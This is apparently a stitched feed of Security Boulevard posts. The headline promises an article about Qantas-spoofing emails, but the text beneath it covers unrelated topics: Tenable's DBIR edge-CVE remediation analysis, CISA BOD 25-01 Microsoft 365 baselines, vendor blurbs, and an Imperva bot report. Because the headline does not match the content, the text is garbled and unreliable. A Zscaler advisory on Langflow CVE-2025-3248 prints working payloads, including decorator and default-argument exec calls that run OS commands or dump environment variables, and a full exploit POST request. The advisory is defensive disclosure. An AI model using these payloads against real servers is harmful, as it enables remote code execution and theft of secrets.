Security Boulevard

Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims

The post Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims appeared first on Security Boulevard.

The 2025 Verizon Data Breach Investigations Report (DBIR) reveals that vulnerability exploitation was present in 20% of breaches — a 34% increase year-over-year. To support the report, Tenable Research contributed enriched data on the most exploited vulnerabilities. In this blog, we analyze 17 edge-related CVEs and remediation trends across industry sectors.

Background

Since 2008, Verizon’s annual Data Breach Investigations Report (DBIR) has helped organizations understand evolving cyber threats. For the 2025 edition, Tenable Research contributed enriched data on the most exploited vulnerabilities of the past year. We analyzed over 160 million data points and zeroed-in on the 17 edge device CVEs featured in the DBIR to understand their average remediation times. In this blog, we take a closer look at these vulnerabilities, revealing industry-specific trends and highlighting where patching still lags — often by months.

In this year’s DBIR, vulnerabilities in Virtual Private Networks (VPNs) and edge devices were particular areas of concern, accounting for 22% of the CVE-related breaches in this year’s report, almost eight times the amount of 3% found in the 2024 report.

Analysis

The 2025 DBIR found that exploitation of vulnerabilities surged to be one of the top initial access vectors for 20% of data breaches. This represents a 34% increase over last year’s report and is driven in part by the zero-day exploitation of VPN and edge device vulnerabilities – asset classes that traditional endpoint detection and response (EDR) vendors struggle to assess effectively. The DBIR calls special attention to 17 CVEs affecting these edge devices, which remain valuable targets for attackers. Tenable Research analyzed these 17 CVEs and evaluated which industries had the best and worst remediation rates across the vulnerabilities. As a primer, the table below provides this list of CVEs and details for each, including their Common Vulnerability Scoring System (CVSS) and Tenable Vulnerability Priority Rating (VPR) scores. It’s worth noting that each of these CVEs was added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) list in 2024.

CVE Description CVSSv3 VPR Tenable Blog CVE-2024-20359 Cisco ASA and FTD Software Persistent Local Code Execution Vulnerability 6.0 6.7 CVE-2024-20353, CVE-2024-20359: Frequently Asked Questions About ArcaneDoor CVE-2023-6548 Citrix NetScaler ADC and Gateway Authenticated Remote Code Execution (RCE) Vulnerability 8.8 7.4 CVE-2023-6548, CVE-2023-6549: Zero-Day Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway CVE-2023-6549 Citrix NetScaler ADC and Gateway Denial of Service Vulnerability 7.5 5.1 CVE-2023-48788 FortiClient Enterprise Management Server (FortiClientEMS) SQL Injection Vulnerability 9.8 9.4 CVE-2023-48788: Critical Fortinet FortiClientEMS SQL Injection Vulnerability CVE-2024-21762 Fortinet FortiOS Out-of-bound Write Vulnerability in sslvpnd 9.8 7.4 CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability CVE-2024-23113 Fortinet FortiOS Format String Vulnerability 9.8 7.4 CVE-2024-47575 FortiManager Missing Authentication in fgfmsd Vulnerability (FortiJump) 9.8 9.6 CVE-2024-47575: Frequently Asked Questions About FortiJump Zero-Day in FortiManager and FortiManager Cloud CVE-2023-46805 Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass Vulnerability 8.2 6.7 CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways CVE-2024-21887 Ivanti Connect Secure and Ivanti Policy Secure Command Injection Vulnerability 9.1 9.8 CVE-2024-21893 Ivanti Connect Secure, Ivanti Policy Secure and Ivanti Neurons for ZTA Server-Side Request Forgery (SSRF) Vulnerability 8.2 7.2 CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893: Frequently Asked Questions for Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways CVE-2023-36844 Juniper Networks Junos OS PHP External Variable Modification Vulnerability 5.3 2.9 Exploit Chain Targets Unpatched Juniper EX Switches and SRX Firewalls CVE-2023-36845 Juniper Networks Junos OS PHP External Variable Modification Vulnerability 9.8 8.4 CVE-2023-36846 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2023-36847 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2023-36851 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2024-3400 Command Injection Vulnerability in the GlobalProtect Gateway feature of PAN-OS 10.0 10 CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild CVE-2024-40766 SonicWall SonicOS Management Access and SSLVPN Improper Access Control Vulnerability 9.8 7.4  

*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on April 23 and reflects VPR at that time.

Tenable Research Analyzes Edge CVE Remediation Trends

Featured prominently in the DBIR, these 17 edge device CVEs were further analyzed by Tenable Research and are organized by vendor with each chart below consisting of CVEs fixed in the same patch release. To understand remediation efforts from Tenable’s telemetry data, we analyzed the average time in days for remediation of these vulnerabilities. The charts shown below spotlight the three industries that had the shortest average time to remediate each vulnerability as well as the three sectors that took the longest amount of time to remediate.

Cisco

CVE-2024-20359 was highlighted in April 2024 by Cisco Talos as one of two known vulnerabilities being exploited by an advanced persistent threat (APT) actor labeled as UAT4356 by Talos and STORM-1849 by the Microsoft Threat Intelligence Center. The flaw was used as part of an espionage campaign known as ArcaneDoor. From our analysis, we found that the education, energy and utilities, and shipping and transportation industries had the longest average remediation time for this vulnerability. CVE-2024-20359 was added to the CISA KEV list on April 24, 2024; the same date Cisco Talos released its research on ArcaneDoor. This KEV addition had a due date of seven days for federal civilian executive branch (FCEB) agencies, which are mandated by Binding Operational Directive (BOD) 22-01. Despite this short patch window, we see that the government sector had a surprisingly high average remediation rate of 116 days. While this is well outside the KEV due date, government was one of the three industries with the fastest average remediation rate.

Source: Tenable Research, April 2025

Citrix

CVE-2023-6548 and CVE-2023-6549 are a pair of zero-day vulnerabilities that were exploited against Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway appliances. These vulnerabilities were patched in early January 2024, only months after Citrix addressed CVE-2023-4966, a critical flaw in NetScaler appliances called “CitrixBleed” that was widely exploited by a variety of attackers. While Citrix appliances continue to remain a high value target for attackers, the remediation rates, even amongst the three industries with the shortest average remediation rates, are much higher than we anticipated. The lowest average patch rate observed was 160 days for the consulting industry.

Source: Tenable Research, April 2025

Fortinet

CVE-2024-21762 and CVE-2024-23113 are two critical severity vulnerabilities affecting Fortinet’s FortiOS network operating system. At the time the Fortinet advisory was released for these vulnerabilities, CVE-2024-21762 was listed as “potentially being exploited in the wild.” Just a day later, CISA added it to the KEV list. Similar to the Citrix vulnerabilities above, the average remediation time for these vulnerabilities ranged from 172 days on the low end to over 260 days on the high end. The consulting industry had the longest average remediation rate while the software, internet and technology sector had the shortest at 172 days.

Source: Tenable Research, April 2025

In stark contrast to the Fortinet CVEs above is CVE-2023-48788, a critical SQL injection vulnerability affecting FortiClient Enterprise Management Server (FortiClientEMS). The communications and telecommunications sector led the way with an average remediation rate of only 12 days with healthcare a distant second, with an average of 71 days to remediate the flaw.

Source: Tenable Research, April 2025

Similar to CVE-2023-48788, CVE-2024-47575, a missing authentication vulnerability in FortiManager dubbed “FortiJump,” appears to have been urgently addressed by organizations. Our analysis revealed it had the lowest average remediation rates of the 17 CVEs we examined. Remediation times averaged a week, even for the slowest to patch industries.

Source: Tenable Research, April 2025

Ivanti

Over the last five years, Ivanti’s Connect Secure and Policy Secure have been targeted by a variety of threat actors including ransomware groups and other nation-state aligned threat actors. Unsurprisingly, CVE-2023-46805 and CVE-2024-21887 have been reportedly abused by threat actors in chained attacks to achieve RCE. Additionally, these flaws were exploited as zero-days. From our analysis, even the quickest of industries to remediate these flaws took over 260 days to do so with the highest average just shy of 300 days.

Source: Tenable Research, April 2025

Only a few weeks after patches for CVE-2023-46805 and CVE-2024-21887 were released, Ivanti released a new advisory with additional CVEs, including CVE-2024-21893. While initially it was believed that CVE-2024-21893 was only exploited in limited attacks, Shadowserver reported a major increase in exploit activity hours prior to a public proof-of-concept (PoC) being released. Interestingly this vulnerability saw some differing remediation rates with the biotechnology and chemicals sector being the fastest to patch with an average of nine days for remediation.

Source: Tenable Research, April 2025

Juniper Networks

Next we examined five CVEs from Juniper Networks (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847 and CVE-2023-36851) affecting Junos OS. These vulnerabilities were quickly exploited in a chained attack just days after being disclosed by Juniper Networks, which released its patches on August 17, 2024. While four of the five vulnerabilities had medium severity CVSSv3 scores, chaining these flaws allows for a remote, unauthenticated attacker to execute arbitrary code on unpatched devices. The average remediation rate for these vulnerabilities varied greatly, with food and beverage at over 420 days and shipping and transportation on the low end with an average remediation time of 80 days.

Source: Tenable Research, April 2025

Palo Alto Networks

CVE-2024-3400 is a critical command injection vulnerability affecting the Palo Alto Networks GlobalProtect Gateway feature of PAN-OS that was exploited in the wild as a zero-day. In our dataset, this CVE had a smaller footprint than others examined, yet it shared a similar trend with most industries requiring over 100 days to remediate. The banking, finance and insurance sector performed far better with an average of 45 days to close out this vulnerability.

Source: Tenable Research, April 2025

SonicWall

The final CVE we examined was CVE-2024-40766, a critical improper access control vulnerability in the SonicWall SonicOS management access and SSLVPN. This flaw saw exploitation from ransomware groups, including Fog and Akira, which utilized the vulnerability to gain initial access to their victims' networks. In the case of this SonicWall vulnerability, average remediation rates were low in comparison to the other CVEs we examined, with the slowest sector taking 52 days (consulting) and the fastest (engineering) taking an average of only six days.

Source: Tenable Research, April 2025

Conclusion

The 17 CVEs we examined in our analysis, while only representing a small portion of the CISA KEV, encompass devices that have an elevated risk, due to their placement at the forefront of a network. Despite these being some of the most valuable targets for attackers, our examination of remediation rates show us that there’s still room for improvement across all industry verticals. Known and exploitable vulnerabilities continue to be abused by threat actors, many of which take advantage of readily available exploits. Data has become increasingly valuable and attackers and APT groups alike have zeroed in on the exploits and vulnerabilities that provide and help them maintain access to victim networks. In order to reduce risk and harden your networks, we recommend addressing each of the CVEs discussed in this post as well as reading the Verizon 2025 DBIR to understand the trends and tactics used by threat actors. Security isn’t just for infosec professionals — it’s everyone’s responsibility. The data compiled by Verizon, in collaboration with Tenable, offer valuable insights into today’s modern threat landscape and what you can do to better protect the networks, devices and people you defend.

Identifying affected systems

A list of Tenable plugins for the vulnerabilities discussed in the blog can be found on the individual CVE pages for each of the CVEs listed below. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

• CVE-2024-20359
• CVE-2023-6548
• CVE-2023-6549
• CVE-2023-48788
• CVE-2024-21762
• CVE-2024-23113
• CVE-2024-47575
• CVE-2023-46805
• CVE-2024-21887
• CVE-2024-21893
• CVE-2023-36844
• CVE-2023-36845
• CVE-2023-36846
• CVE-2023-36847
• CVE-2023-36851
• CVE-2024-3400
• CVE-2024-40766

Get more information

• Verizon 2025 Data Breach Investigations Report (DBIR)

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

The post Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends appeared first on Security Boulevard.

U.S. government agencies are required to bring their Microsoft 365 cloud services into compliance with a recent Binding Operational Directive. Here’s how Tenable can help.

Overview

Malicious threat actors are constantly targeting cloud environments. The risk of compromise can be reduced by enforcing secure configurations of security controls. With this goal in mind, the Cybersecurity and Infrastructure Security Agency (CISA) created the Secure Cloud Business Applications (SCuBA) project. The SCuBA project currently provides secure configuration baselines for Microsoft 365 and Google Workspace.

In December 2024, as part of the SCuBA project, CISA released a Binding Operational Directive (BOD) 25-01: Implementation Guidance for Implementing Secure Practices for Cloud Services. This directive requires U.S. government agencies and departments in the federal civilian executive branch to implement secure configuration baselines for certain software as a service (SaaS) products.

Scope

The scope of the BOD 25-01 includes all production or operational cloud tenants (operating in or as a federal information system) utilizing Microsoft 365. CISA may release additional SCuBA Secure Configuration Baselines for other cloud products which would fall under the scope of this directive. The complete list of required configurations is available here.

While the CISA BOD 25-01 applies to government agencies, any organization using Microsoft 365 would reduce the risk of compromise by adhering to these baselines.

Required actions

According to BOD 25-01, there are several required actions for in-scope cloud tenant agencies that shall be completed by the following dates:

• February 21, 2025 - following CISA reporting instructions:
  • submit tenant name and system owning agency/component for each tenant
  • submit an updated the inventory annually in the first quarter
• April 25, 2025 - deploy SCuBA assessment tools and begin continuous reporting
• June 20, 2025 - implement all mandatory SCuBA policies identified at BOD 25-01 Required Configurations.

In-scope cloud tenants are also required to:

• Implement all future updates to mandatory SCuBA policies
• Implement all mandatory SCuBA Secure Configuration Baselines and begin continuous monitoring prior to granting an Authorization to Operate for new cloud tenants.

Required configurations

As of March 2025, the following configurations are required for BOD 25-01:

Microsoft 365 (M365) Microsoft Entra ID MS.AAD.1.1v1 Legacy authentication SHALL be blocked. MS.AAD.2.1v1 Users detected as high risk SHALL be blocked. MS.AAD.2.3v1 Sign-ins detected as high risk SHALL be blocked. MS.AAD.3.1v1 Phishing-resistant MFA SHALL be enforced for all users. MS.AAD.3.2v1 If Phishing-resistant MFA has not been enforced yet, then an alternative MFA method SHALL be enforced for all users. MS.AAD.3.3v1 If Phishing-resistant MFA has not been enforced yet and Microsoft Authenticator is enabled, it SHALL be configured to show login context information. MS.AAD.3.4v1 The Authentication Methods Manage Migration feature SHALL be set to Migration Complete. MS.AAD.3.6v1 Phishing-resistant MFA SHALL be required for Highly Privileged Roles. MS.AAD.5.1v1 Only administrators SHALL be allowed to register applications. MS.AAD.5.2v1 Only administrators SHALL be allowed to consent to applications. MS.AAD.5.3v1 An admin consent workflow SHALL be configured for applications. MS.AAD.5.4v1 Group owners SHALL NOT be allowed to consent to applications. MS.AAD.6.1v1 User passwords SHALL NOT expire. MS.AAD.7.1v1 A minimum of two users and a maximum of eight users SHALL be provisioned with the Global Administrator role. MS.AAD.7.2v1 Privileged users SHALL be provisioned with finer-grained roles instead [of] Global Administrator. MS.AAD.7.3v1 Privileged users SHALL be provisioned cloud-only accounts that are separate from an on-premises directory or other federated identity providers. MS.AAD.7.4v1 Permanent active role assignments SHALL NOT be allowed for highly privileged roles except for emergency and service accounts. MS.AAD.7.5v1 Provisioning users to highly privileged roles SHALL NOT occur outside of a PAM system, because this bypasses critical controls the PAM system provides. MS.AAD.7.6v1 Activation of the Global Administrator role SHALL require approval. MS.AAD.7.7v1 Eligible and Active highly privileged role assignments SHALL trigger an alert. MS.AAD.7.8v1 User activation of the Global Administrator role SHALL trigger an alert. Microsoft Defender MS.DEFENDER.1.1v1 The standard and strict preset security policies SHALL be enabled. MS.DEFENDER.1.2v1 All users SHALL be added to Exchange Online Protection in either the standard or strict preset security policy. MS.DEFENDER.1.3v1 All users SHALL be added to Defender for Office 365 Protection in either the standard or strict preset security policy. MS.DEFENDER.1.4v1 Sensitive accounts SHALL be added to Exchange Online Protection in the strict preset security policy. MS.DEFENDER.1.5v1 Sensitive accounts SHALL be added to Defender for Office 365 Protection in the strict preset security policy. MS.DEFENDER.4.1v2 A custom policy SHALL be configured to protect PII and sensitive information, as defined by the agency, blocking at a minimum: credit card numbers, U.S. Individual Taxpayer Identification Numbers (ITINs), and U.S. Social Security numbers (SSNs). MS.DEFENDER.5.1v1 At a minimum, the alerts required by the CISA M365 Secure Configuration Baseline for Exchange Online SHALL be enabled. MS.DEFENDER.6.1v1 Microsoft Purview Audit (Standard) logging SHALL be enabled. MS.DEFENDER.6.2v1 Microsoft Purview Audit (Premium) logging SHALL be enabled for ALL users. Exchange Online MS.EXO.1.1v1 Automatic forwarding to external domains SHALL be disabled. MS.EXO.2.2v2 An SPF policy SHALL be published for each domain that fails all non-approved senders. MS.EXO.4.1v1 A DMARC policy SHALL be published for every second-level domain. MS.EXO.4.2v1 The DMARC message rejection option SHALL be p=reject. MS.EXO.4.3v1 The DMARC point of contact for aggregate reports SHALL include [email protected]. MS.EXO.5.1v1 SMTP AUTH SHALL be disabled. MS.EXO.6.1v1 Contact folders SHALL NOT be shared with all domains. MS.EXO.6.2v1 Calendar details SHALL NOT be shared with all domains. MS.EXO.7.1v1 External sender warnings SHALL be implemented. MS.EXO.13.1v1 Mailbox auditing SHALL be enabled. Power Platform MS.POWERPLATFORM.1.1v1 The ability to create production and sandbox environments SHALL be restricted to admins. MS.POWERPLATFORM.1.2v1 The ability to create trial environments SHALL be restricted to admins. MS.POWERPLATFORM.2.1v1 A DLP policy SHALL be created to restrict connector access in the default Power Platform environment. MS.POWERPLATFORM.3.1v1 Power Platform tenant isolation SHALL be enabled. SharePoint Online and OneDrive MS.SHAREPOINT.1.1v1 External sharing for SharePoint SHALL be limited to Existing Guests or Only People in your Organization. MS.SHAREPOINT.1.2v1 External sharing for OneDrive SHALL be limited to Existing Guests or Only People in your Organization. MS.SHAREPOINT.2.1v1 File and folder default sharing scope SHALL be set to Specific People (only the people the user specifies). MS.SHAREPOINT.2.2v1 File and folder default sharing permissions SHALL be set to View only. Microsoft Teams MS.TEAMS.1.2v1 Anonymous users SHALL NOT be enabled to start meetings. MS.TEAMS.2.1v1 External access for users SHALL only be enabled on a per-domain basis. MS.TEAMS.2.2v1 Unmanaged users SHALL NOT be enabled to initiate contact with internal users. MS.TEAMS.3.1v1 Contact with Skype users SHALL be blocked. MS.TEAMS.4.1v1 Teams email integration SHALL be disabled. Additional configurations

In addition to the required configurations, the following configurations can also be evaluated:

Microsoft 365 (M365) Microsoft Entra ID MS.AAD.2.2v1 A notification SHOULD be sent to the administrator when high-risk users are detected. MS.AAD.3.7v1 Managed devices SHOULD be required for authentication. MS.AAD.3.8v1 Managed Devices SHOULD be required to register MFA. MS.AAD.7.9v1 User activation of other highly privileged roles SHOULD trigger an alert. MS.AAD.8.1v1 Guest users SHOULD have limited or restricted access to Microsoft Entra ID directory objects. MS.AAD.8.2v1 Only users with the Guest Inviter role SHOULD be able to invite guest users. Microsoft Defender MS.DEFENDER.2.1v1 User impersonation protection SHOULD be enabled for sensitive accounts in both the standard and strict preset policies. MS.DEFENDER.2.2v1 Domain impersonation protection SHOULD be enabled for domains owned by the agency in both the standard and strict preset policies. MS.DEFENDER.2.3v1 Domain impersonation protection SHOULD be added for important partners in both the standard and strict preset policies. MS.DEFENDER.3.1v1 Safe attachments SHOULD be enabled for SharePoint, OneDrive, and Microsoft Teams. MS.DEFENDER.4.2v1 The custom policy SHOULD be applied to Exchange, OneDrive, SharePoint, Teams chat, and Devices. MS.DEFENDER.4.3v1 The action for the custom policy SHOULD be set to block sharing sensitive information with everyone. MS.DEFENDER.4.4v1 Notifications to inform users and help educate them on the proper use of sensitive information SHOULD be enabled in the custom policy. Exchange Online MS.EXO.3.1v1 DKIM SHOULD be enabled for all domains. MS.EXO.4.4v1 An agency point of contact SHOULD be included for aggregate and failure reports. MS.EXO.12.1v1 IP allow lists SHOULD NOT be created. MS.EXO.12.2v1 Safe lists SHOULD NOT be enabled. Power Platform MS.POWERPLATFORM.2.2v1 Non-default environments SHOULD have at least one DLP policy affecting them. MS.POWERPLATFORM.5.1v1 The ability to create Power Pages sites SHOULD be restricted to admins. SharePoint Online and OneDrive MS.SHAREPOINT.1.3v1 External sharing SHALL be restricted to approved external domains and/or users in approved security groups per interagency collaboration needs. MS.SHAREPOINT.3.1v1 Expiration days for Anyone links SHALL be set to 30 days or less. MS.SHAREPOINT.3.2v1 The allowable file and folder permissions for links SHALL be set to View only. MS.SHAREPOINT.3.3v1 Reauthentication days for people who use a verification code SHALL be set to 30 days or less. Microsoft Teams MS.TEAMS.1.1v1 External meeting participants SHOULD NOT be enabled to request control of shared desktops or windows. MS.TEAMS.1.3v1 Anonymous users and dial-in callers SHOULD NOT be admitted automatically. MS.TEAMS.1.4v1 Internal users SHOULD be admitted automatically. MS.TEAMS.1.5v1 Dial-in users SHOULD NOT be enabled to bypass the lobby. MS.TEAMS.1.6v1 Meeting recording SHOULD be disabled. MS.TEAMS.1.7v1 Record an event SHOULD be set to Organizer can record. MS.TEAMS.2.3v1 Internal users SHOULD NOT be enabled to initiate contact with unmanaged users. MS.TEAMS.5.1v1 Agencies SHOULD only allow installation of Microsoft apps approved by the agency. MS.TEAMS.5.2v1 Agencies SHOULD only allow installation of third-party apps approved by the agency. MS.TEAMS.5.3v1 Agencies SHOULD only allow installation of custom apps approved by the agency. How Tenable can help

Tenable Vulnerability Management and Nessus customers can audit the posture of their Microsoft 365 environment with the CISA SCuBA for Microsoft 365 audit files:

• CISA SCuBA Microsoft 365 Entra ID
• CISA SCuBA Microsoft 365 Defender
• CISA SCuBA Microsoft 365 Exchange Online
• CISA SCuBA Microsoft 365 Power Platform
• CISA SCuBA Microsoft 365 SharePoint Online OneDrive
• CISA SCuBA Microsoft 365 Teams

More details for configuring your SCuBA Microsoft 365 environment for Compliance Auditing are available at Configure Azure for a Compliance Audit.

The post CISA BOD 25-01 Compliance: What U.S. Government Agencies Need to Know appeared first on Security Boulevard.

How Can Secure NHI Lifecycle Management Drive Innovation? Do we ever ponder the security of our machine identities? This question becomes increasingly pertinent as more organizations rely on cloud-based platforms for their operations. These are often a fertile playground for Non-Human Identities (NHIs), which play a critical role. But how does secure NHI management foster […]

The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Entro.

The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Security Boulevard.

How Can Budget-Friendly Secrets Management Boost Your Cybersecurity Strategy? Navigating vast of cybersecurity can often seem like attempting to solve an intricate puzzle. One key piece that often gets overlooked is the management of Non-Human Identities (NHIs) and their associated secrets. Despite their significance, finding a cost-effective solution to handle this crucial aspect of your […]

The post Secrets Management Solutions That Fit Your Budget appeared first on Entro.

The post Secrets Management Solutions That Fit Your Budget appeared first on Security Boulevard.

Is Your Travel Sector Business Harnessing the Power of NHI Management? Every industry faces its unique set of challenges when it comes to guaranteeing cybersecurity. However, the travel sector, with its immense data volumes and complex, interconnected frameworks, is at a higher risk. To stay confident, organizations need to pay closer attention to NHI Management […]

The post Travel Sector: Stay Confident with NHI Management appeared first on Entro.

The post Travel Sector: Stay Confident with NHI Management appeared first on Security Boulevard.

Why Should Tech Leaders Place Their Trust in Cloud-Native Security? Let’s ask another question: What better assurance for tech leaders than a robust system that offers comprehensive end-to-end protection? This is precisely what cloud-native security does, and why it is gaining traction. Cloud-native security, with its focus on non-human identities (NHIs) and secrets security management, […]

The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Entro.

The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Security Boulevard.

Steve Carter discusses the evolution of the vulnerability management market, as well as where vulnerability management has failed and why the next phase has to center around automation and scale. The problem, as Carter sees it, is deceptively simple: Organizations are drowning in vulnerabilities but still can’t prioritize or fix them quickly. Scanners can identify..

The post The Evolution of Vulnerability Management with Steve Carter appeared first on Security Boulevard.

Shrav Mehta explores lessons from 2024’s costliest data breaches and provides actionable protection strategies for 2025. Shrav and Alan analyze the current cybersecurity landscape and discuss how businesses can strengthen their defenses.  Compliance has always been a pain point for engineering teams—tedious, expensive, and often disconnected from real-time security practices. Shrav discusses the shift away..

The post Actionable Protection Strategies for 2025 with Shrav Mehta appeared first on Security Boulevard.

Author/Presenter: Laura Johnson

Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.

Permalink

The post BSidesLV24 – Common Ground – Cyber Harassment: Stop The Silence, Save Lives appeared first on Security Boulevard.

IntroductionCVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, thus posing a significant risk to organizations using Langflow in their AI development workflows.RecommendationsUpgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.Restrict access: Limit exposure by placing Langflow behind a ZTNA architecture like Zscaler Private Access™ (ZPA) with AppProtection.Implement input sandboxing: If custom validation is needed, avoid using the exec() function with untrusted code or employ sandboxing mechanisms.Monitor and alert: Use detection to flag anomalous requests to validation endpoints and unexpected outgoing connections.Affected VersionsAll Langflow versions prior to 1.3.0 are susceptible to code injection.Vulnerability DetailsLangflow's /api/v1/validate/code endpoint contains a vulnerability in its handling of user-submitted code. In versions prior to 1.3.0, the application uses Python’s compile and exec() to validate function definitions by parsing it into an Abstract Syntax Tree (AST) and processing specific components. The steps include:Parsing the code field using ast.parse().Importing specified modules.Executing function definitions (ast.FunctionDef) to validate their structure.The issue arises from Python’s behavior during function definition, where decorators and default argument values are evaluated immediately. Malicious code embedded in these areas executes during AST processing, enabling attackers to achieve unauthenticated RCE by submitting payloads to the endpoint. The lack of authentication or sandboxing allows exploitation without restriction.An overview of the attack chain is shown below:Figure 1: Attack chain illustrating the progression of exploitation for CVE-2025-3248.How It WorksExploiting CVE-2025-3248 involves the following steps:1. The attacker locates a publicly accessible or an internal Langflow instance (using compromised credentials) running a vulnerable version (prior to 1.3.0).2. The attacker embeds malicious code into either:a. Decorators: Malicious logic placed within a decorator is executed as soon as the AST is processed. In the example below, Here, the exec() invokes an arbitrary command (e.g., to write the system’s id output to a file), which executes immediately when the code is passed to the endpoint. @exec("import os; os.system('id %26gt; /tmp/pwned')")
def foo():
passb. Default function arguments: The attacker can also embed malicious commands into default argument values, which are evaluated at function definition time. In the example below, the payload causes the exec() to retrieve environment variables during AST processing, but the payload can also be used to perform malicious actions.def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
pass3. The attacker sends the payload to Langflow’s /api/v1/validate/code endpoint via a POST request. Below is an example request that writes a file to the server: POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172
{
"code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('This server is vulnerable')\")
def foo():
pass"
}4. When the server processes the payload, the embedded code is executed immediately during validation. An example response is shown below:HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 63
{
"imports": {"errors": []},
"function": {"errors": []}
}Although the response appears benign, the malicious payload has already succeeded in executing and writing to a file named hacked.txt on the server. This same process could also easily be used to write a web shell to the server to facilitate remote access.ConclusionCVE-2025-3248 highlights the risks of executing dynamic code without secure authentication and sandboxing measures. This vulnerability serves as a critical reminder for organizations to approach code-validation features with caution, particularly in applications exposed to the internet. Zscaler ThreatLabz encourages organizations to follow the recommendations outlined in this blog.Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection for CVE-2025-3248.Zscaler Private Access AppProtection932200: RCE Bypass TechniqueDetails related to these signatures can be found in the Zscaler Threat Library.

The post CVE-2025-3248: RCE vulnerability in Langflow appeared first on Security Boulevard.

Integration delivers real-time, circuit-level energy insights and analytics to help data centers reduce costs, improve efficiency, and meet sustainability goals Toronto, ON and Vancouver, BC – April 22, 2025: CircuitMeter, a pioneer in real-time energy metering and analytics, and Hyperview, the leading cloud-based data center infrastructure management (DCIM) platform, are proud to ...

The post CircuitMeter Integrates Its Advanced Energy Metering With Hyperview DCIM Platform appeared first on Hyperview.

The post CircuitMeter Integrates Its Advanced Energy Metering With Hyperview DCIM Platform appeared first on Security Boulevard.

The AI Bot Epidemic: The Imperva 2025 Bad Bot Report
madhav
Tue, 04/22/2025 - 17:10

The ubiquity of accessible AI tools has lowered the barrier to entry for threat actors, helping them create and deploy malicious bots at an unprecedented scale. Moreover, generative AI (GenAI) simplifies bot development, which is seeing automated threats evolve swiftly. GenAI is helping them grow in sophistication and volume while honing their obfuscation techniques to help them fly under the security radar.

AI is also being used to amplify and simplify attacks and unpack failed attempts helping attackers refine their techniques to evade detection tools with greater precision. These cunning, complex bots put entities in every sector at significant risk.

Surpassing Human Traffic

As the volumes of automated traffic skyrocket, security teams need to adapt their approach to application security, as they are under pressure to fight not only human actors but automated bots that are seemingly always a step ahead.

According to the 2025 Imperva Bad Bot Report, titled “The Rapid Rise of Bots and The Unseen Risk for Business,” automated traffic overtook human activity for the first time in ten years, making up more than half (51%) of all internet traffic last year. This trend has been driven, for the most part, by the rapid adoption of AI and LLMs.

The surge in AI-driven bot creation has serious implications for businesses worldwide. As automated traffic accounts for more than half of all web activity, organizations face heightened risks from bad bots, which are becoming more prolific every day.

Concurrently, the report revealed that bad bot activity has risen for the sixth year in a row, with malicious bots now accounting for more than a third (37%) of all web traffic, a sharp rise from just over 30% in 2023.

Bot Attack Sophistication Trends

In 2024, “advanced and moderate” bot attacks together made up more than half (55%) of all bot attacks. Bot operators are using sophisticated techniques to mimic human traffic and carry out nefarious activities—which is why this type of attack is more difficult to detect and mitigate.

The report noted, however, a marked change in the complexity of bot attacks. Simple, high-volume attacks have soared, now accounting for 45% of all bot attacks, compared to only 40% in 2023. This increase is due, for the most part, to the free availability of AI-powered automation tools, which allow attackers, even those with limited technical ability, to initiate bot attacks with ease.

The use of AI tools also explains that 31% of all attacks recorded and mitigated by Imperva were automated, as defined by the OWASP 21 Automated Threats—a set of automated attacks that employ bots and scripts to exploit web application vulnerabilities at scale, slip past security controls, and disrupt entities in every sector.

Modern APIs Must Fight Bad Bots

Today’s businesses rely on APIs to drive digital transformation, AI automation, and seamless integrations, making them essential for agility, innovation, and competitive advantage. However, this functionality makes them prime targets for bad bots to commit fraud, scrape data, and bypass security controls. In fact, last year, the Imperva research team saw a significant surge in API-directed attacks, with 44% of advanced bot traffic targeting APIs.

“The business logic inherent to APIs is powerful, but it also creates unique vulnerabilities that malicious actors are eager to exploit,” Chang said. “As organizations embrace cloud-based services and microservices architectures, it’s vital to understand that the very features that make APIs essential can also leave them susceptible to risk of fraud and data breaches.”

Residential Proxies Still Hamper Detection

